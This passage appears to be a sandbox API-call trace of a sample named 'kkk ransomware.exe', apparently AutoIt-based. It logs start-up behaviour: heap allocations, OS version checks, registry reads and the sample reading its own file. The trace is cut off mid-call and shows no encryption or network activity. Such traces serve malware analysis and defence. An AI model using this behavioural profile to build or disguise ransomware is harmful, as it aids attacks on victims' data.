\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿuÞÔÑ\x94þ\x8c", lpUsedDefaultChar=0x0) returned 256 [0078.181] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x41f20e) returned 0x0 [0078.305] RtlSizeHeap (HeapHandle=0x2af0000, Flags=0x0, MemoryPointer=0x2af2810) returned 0x80 [0078.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2af1a00 [0078.306] RtlSizeHeap (HeapHandle=0x2af0000, Flags=0x0, MemoryPointer=0x2af2810) returned 0x80 [0078.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af1a40 [0078.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af1a58 [0078.388] GetVersionExW (in: lpVersionInformation=0x8cfd84*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x2f2e2d2c, dwMinorVersion=0x33323130, dwBuildNumber=0x37363534, dwPlatformId=0x0, szCSDVersion="\x01") | out: lpVersionInformation=0x8cfd84*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0078.389] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76750000 [0078.390] GetProcAddress (hModule=0x76750000, lpProcName="IsWow64Process") returned 0x76765a20 [0078.390] GetCurrentProcess () returned 0xffffffff [0078.390] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x8cfedc | out: Wow64Process=0x8cfedc) returned 1 [0078.390] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76750000 [0078.390] GetProcAddress (hModule=0x76750000, lpProcName="GetNativeSystemInfo") returned 0x76765130 [0078.390] GetNativeSystemInfo (in: lpSystemInfo=0x8cfea0 | out: lpSystemInfo=0x8cfea0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0078.429] FreeLibrary (hLibModule=0x76750000) returned 1 [0078.429] FreeLibrary (hLibModule=0x76750000) returned 1 [0078.429] RtlSizeHeap (HeapHandle=0x2af0000, Flags=0x0, MemoryPointer=0x2af2810) returned 0x80 [0078.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2af1a68 [0078.429] RtlSizeHeap (HeapHandle=0x2af0000, Flags=0x0, MemoryPointer=0x2af2810) returned 0x80 [0078.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af1a80 [0078.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af1a98 [0078.429] RtlSizeHeap (HeapHandle=0x2af0000, Flags=0x0, MemoryPointer=0x2af2810) returned 0x80 [0078.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af2898 [0078.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af28b0 [0078.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af28c0 [0078.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af28d8 [0078.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af28e8 [0078.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af2900 [0078.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af2910 [0078.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af2928 [0078.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af2938 [0078.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af2950 [0078.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af2960 [0078.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af2978 [0078.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af2988 [0078.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af29a0 [0078.431] MapVirtualKeyW (uCode=0x5b, uMapType=0x0) returned 0x5b [0078.727] MapVirtualKeyW (uCode=0x10, uMapType=0x0) returned 0x2a [0078.727] MapVirtualKeyW (uCode=0xa0, uMapType=0x0) returned 0x2a [0078.727] MapVirtualKeyW (uCode=0xa1, uMapType=0x0) returned 0x36 [0078.727] MapVirtualKeyW (uCode=0x11, uMapType=0x0) returned 0x1d [0078.727] MapVirtualKeyW (uCode=0x12, uMapType=0x0) returned 0x38 [0078.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af29b0 [0078.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af29c8 [0078.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af29d8 [0078.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af29f0 [0078.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af2a00 [0078.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af2a18 [0078.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af2a28 [0078.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af2a40 [0078.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af2a50 [0078.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af2a68 [0078.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af2a78 [0078.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af2a90 [0078.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af2aa0 [0078.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af04a0 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af04b0 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af04c8 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af5bd8 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6148 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af5aa0 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af61b8 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af5a10 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6098 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af5b78 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af60d8 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af61c8 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af5ab8 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af60a8 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af5b48 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af60b8 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af5b60 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af60c8 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af5ad0 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6058 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af5a28 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6188 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af5bc0 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6138 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af60e8 [0078.729] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc151 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af5b90 [0078.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6018 [0078.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af04d8 [0078.735] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0078.735] RtlSizeHeap (HeapHandle=0x2af0000, Flags=0x0, MemoryPointer=0x2af2810) returned 0x80 [0078.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af5a58 [0078.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6068 [0078.735] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Mouse", ulOptions=0x0, samDesired=0x1, phkResult=0x8cfea8 | out: phkResult=0x8cfea8*=0x240) returned 0x0 [0078.735] RegQueryValueExW (in: hKey=0x240, lpValueName="SwapMouseButtons", lpReserved=0x0, lpType=0x0, lpData=0x8cfec8, lpcbData=0x8cfeac*=0x8 | out: lpType=0x0, lpData=0x8cfec8*=0x30, lpcbData=0x8cfeac*=0x4) returned 0x0 [0078.735] RegCloseKey (hKey=0x240) returned 0x0 [0078.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af5ae8 [0078.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6158 [0078.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6088 [0078.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6038 [0078.874] RtlSizeHeap (HeapHandle=0x2af0000, Flags=0x0, MemoryPointer=0x2af2810) returned 0x80 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af5ba8 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6168 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af0520 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6198 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af5b00 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6178 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af5b18 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af61a8 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af5a40 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6078 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af5a88 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af61d8 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af5a70 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6028 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af5b30 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af60f8 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af65a0 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af61e8 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6540 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6108 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6558 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6048 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6570 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6118 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6588 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6128 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af65e8 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6680 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6528 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af67a0 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af65b8 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6660 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af65d0 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6740 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6318 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6770 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6300 [0078.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6690 [0078.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af64f8 [0078.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6820 [0078.877] RtlSizeHeap (HeapHandle=0x2af0000, Flags=0x0, MemoryPointer=0x2af2810) returned 0x80 [0078.877] RtlSizeHeap (HeapHandle=0x2af0000, Flags=0x0, MemoryPointer=0x2af2810) returned 0x80 [0078.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x400) returned 0x2af6a08 [0078.877] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x8cf8c0, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\kkk ransomware.exe")) returned 0x35 [0078.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20a) returned 0x2af6e10 [0078.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af6468 [0078.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6730 [0078.985] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AutoIt v3\\AutoIt", ulOptions=0x0, samDesired=0x1, phkResult=0x8cf890 | out: phkResult=0x8cf890*=0x0) returned 0x2 [0078.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6468 | out: hHeap=0x2af0000) returned 1 [0078.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6730 | out: hHeap=0x2af0000) returned 1 [0078.985] RtlSizeHeap (HeapHandle=0x2af0000, Flags=0x0, MemoryPointer=0x2af2810) returned 0x80 [0078.985] RtlSizeHeap (HeapHandle=0x2af0000, Flags=0x0, MemoryPointer=0x2af2810) returned 0x80 [0078.985] RtlSizeHeap (HeapHandle=0x2af0000, Flags=0x0, MemoryPointer=0x2af2810) returned 0x80 [0078.985] LoadLibraryA (lpLibFileName="uxtheme.dll") returned 0x741f0000 [0079.422] GetProcAddress (hModule=0x741f0000, lpProcName="IsThemeActive") returned 0x74222890 [0079.422] IsThemeActive () returned 0x1 [0079.592] SystemParametersInfoW (in: uiAction=0x2000, uiParam=0x0, pvParam=0x8cfea8, fWinIni=0x0 | out: pvParam=0x8cfea8) returned 1 [0079.592] SystemParametersInfoW (in: uiAction=0x2001, uiParam=0x0, pvParam=0x0, fWinIni=0x2 | out: pvParam=0x0) returned 1 [0079.592] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8cfc88 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0079.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2af63a8 [0079.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6710 [0079.592] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4a7f6c, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\kkk ransomware.exe")) returned 0x35 [0079.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0079.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2af6700 [0079.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x2af6700, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 1 [0079.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6700 | out: hHeap=0x2af0000) returned 1 [0079.594] GetLastError () returned 0x0 [0079.594] SetLastError (dwErrCode=0x0) [0079.594] GetLastError () returned 0x0 [0079.594] SetLastError (dwErrCode=0x0) [0079.594] GetLastError () returned 0x0 [0079.594] SetLastError (dwErrCode=0x0) [0079.594] GetLastError () returned 0x0 [0079.594] SetLastError (dwErrCode=0x0) [0079.594] GetLastError () returned 0x0 [0079.594] SetLastError (dwErrCode=0x0) [0079.594] GetLastError () returned 0x0 [0079.594] SetLastError (dwErrCode=0x0) [0079.594] GetLastError () returned 0x0 [0079.594] SetLastError (dwErrCode=0x0) [0079.594] GetLastError () returned 0x0 [0079.594] SetLastError (dwErrCode=0x0) [0079.594] GetLastError () returned 0x0 [0079.594] SetLastError (dwErrCode=0x0) [0079.594] GetLastError () returned 0x0 [0079.595] SetLastError (dwErrCode=0x0) [0079.595] GetLastError () returned 0x0 [0079.595] SetLastError (dwErrCode=0x0) [0079.595] GetLastError () returned 0x0 [0079.595] SetLastError (dwErrCode=0x0) [0079.595] GetLastError () returned 0x0 [0079.595] SetLastError (dwErrCode=0x0) [0079.595] GetLastError () returned 0x0 [0079.595] SetLastError (dwErrCode=0x0) [0079.595] GetLastError () returned 0x0 [0079.595] SetLastError (dwErrCode=0x0) [0079.595] GetLastError () returned 0x0 [0079.595] SetLastError (dwErrCode=0x0) [0079.595] GetLastError () returned 0x0 [0079.595] SetLastError (dwErrCode=0x0) [0079.595] GetLastError () returned 0x0 [0079.595] SetLastError (dwErrCode=0x0) [0079.595] GetLastError () returned 0x0 [0079.595] SetLastError (dwErrCode=0x0) [0079.595] GetLastError () returned 0x0 [0079.595] SetLastError (dwErrCode=0x0) [0079.595] GetLastError () returned 0x0 [0079.595] SetLastError (dwErrCode=0x0) [0079.595] GetLastError () returned 0x0 [0079.595] SetLastError (dwErrCode=0x0) [0079.596] GetLastError () returned 0x0 [0079.596] SetLastError (dwErrCode=0x0) [0079.596] GetLastError () returned 0x0 [0079.596] SetLastError (dwErrCode=0x0) [0079.596] GetLastError () returned 0x0 [0079.596] SetLastError (dwErrCode=0x0) [0079.596] GetLastError () returned 0x0 [0079.596] SetLastError (dwErrCode=0x0) [0079.596] GetLastError () returned 0x0 [0079.596] SetLastError (dwErrCode=0x0) [0079.596] GetLastError () returned 0x0 [0079.596] SetLastError (dwErrCode=0x0) [0079.596] GetLastError () returned 0x0 [0079.596] SetLastError (dwErrCode=0x0) [0079.596] GetLastError () returned 0x0 [0079.596] SetLastError (dwErrCode=0x0) [0079.596] GetLastError () returned 0x0 [0079.596] SetLastError (dwErrCode=0x0) [0079.596] GetLastError () returned 0x0 [0079.596] SetLastError (dwErrCode=0x0) [0079.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x2af0548 [0079.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x2af0568 [0079.598] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\kkk ransomware.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x8cf6dc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x248 [0079.626] GetFileType (hFile=0x248) returned 0x1 [0079.628] ReadFile (in: hFile=0x248, lpBuffer=0x8bf7f4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf6e0, lpOverlapped=0x0 | out: lpBuffer=0x8bf7f4*, lpNumberOfBytesRead=0x8bf6e0*=0x10000, lpOverlapped=0x0) returned 1 [0079.629] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0079.629] SetFilePointer (in: hFile=0x248, lDistanceToMove=65516, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffec [0079.629] ReadFile (in: hFile=0x248, lpBuffer=0x8bf7f4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf6e0, lpOverlapped=0x0 | out: lpBuffer=0x8bf7f4*, lpNumberOfBytesRead=0x8bf6e0*=0x10000, lpOverlapped=0x0) returned 1 [0079.629] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffec [0079.630] SetFilePointer (in: hFile=0x248, lDistanceToMove=131032, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffd8 [0079.630] ReadFile (in: hFile=0x248, lpBuffer=0x8bf7f4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf6e0, lpOverlapped=0x0 | out: lpBuffer=0x8bf7f4*, lpNumberOfBytesRead=0x8bf6e0*=0x10000, lpOverlapped=0x0) returned 1 [0079.630] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffd8 [0079.630] SetFilePointer (in: hFile=0x248, lDistanceToMove=196548, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffc4 [0079.630] ReadFile (in: hFile=0x248, lpBuffer=0x8bf7f4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf6e0, lpOverlapped=0x0 | out: lpBuffer=0x8bf7f4*, lpNumberOfBytesRead=0x8bf6e0*=0x10000, lpOverlapped=0x0) returned 1 [0079.631] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffc4 [0079.631] SetFilePointer (in: hFile=0x248, lDistanceToMove=262064, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffb0 [0079.631] ReadFile (in: hFile=0x248, lpBuffer=0x8bf7f4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf6e0, lpOverlapped=0x0 | out: lpBuffer=0x8bf7f4*, lpNumberOfBytesRead=0x8bf6e0*=0x10000, lpOverlapped=0x0) returned 1 [0079.632] SetFilePointer (in: hFile=0x248, lDistanceToMove=317460, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4d814 [0079.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1000) returned 0x2af7028 [0079.712] ReadFile (in: hFile=0x248, lpBuffer=0x2af7028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8bf6c4, lpOverlapped=0x0 | out: lpBuffer=0x2af7028*, lpNumberOfBytesRead=0x8bf6c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.713] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cf6f4 | out: lpSystemTimeAsFileTime=0x8cf6f4*(dwLowDateTime=0x2d1815c7, dwHighDateTime=0x1d5dff9)) [0079.715] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e814 [0079.877] SetFilePointer (in: hFile=0x248, lDistanceToMove=317480, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4d828 [0080.097] ReadFile (in: hFile=0x248, lpBuffer=0x2af7028, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8cedd0, lpOverlapped=0x0 | out: lpBuffer=0x2af7028*, lpNumberOfBytesRead=0x8cedd0*=0x200, lpOverlapped=0x0) returned 1 [0080.097] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cedbc | out: lpSystemTimeAsFileTime=0x8cedbc*(dwLowDateTime=0x2d54f1a2, dwHighDateTime=0x1d5dff9)) [0080.098] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cedbc | out: lpSystemTimeAsFileTime=0x8cedbc*(dwLowDateTime=0x2d54f1a2, 